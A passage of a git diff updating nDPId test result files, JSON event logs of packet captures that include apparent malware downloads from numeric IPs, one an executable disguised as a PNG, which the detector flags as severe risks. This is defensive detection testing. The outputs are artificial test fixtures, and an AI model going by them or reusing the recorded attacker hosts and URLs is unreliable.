gciQA2PUGAAEATAIgciQApF8HAAEA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":11876,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1352718181050} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 diff --git a/test/results/exe_download.pcap.out b/test/results/exe_download.pcap.out index 66ddf4e49..09929249a 100644 --- a/test/results/exe_download.pcap.out +++ b/test/results/exe_download.pcap.out 
@@ -1,12 +1,12 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"exe_download.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569434051004} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434051004,"flow_last_seen":1569434051004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434051004,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} -01067{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} -00933{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434051004,"flow_last_seen":1569434051004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434051004,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} +01067{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} +00933{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","packets-captured":703,"packets-processed":703,"total-skipped-flows":0,"total-l4-data-len":679485,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434056186} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 703/703 diff --git a/test/results/exe_download_as_png.pcap.out b/test/results/exe_download_as_png.pcap.out index 3633d7f55..33913a43f 100644 --- a/test/results/exe_download_as_png.pcap.out +++ b/test/results/exe_download_as_png.pcap.out 
@@ -1,12 +1,12 @@ 00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"exe_download_as_png.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569434903040} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434903040,"flow_last_seen":1569434903040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434903040,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}} -01045{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}} 
-00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434903040,"flow_last_seen":1569434903040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434903040,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": 
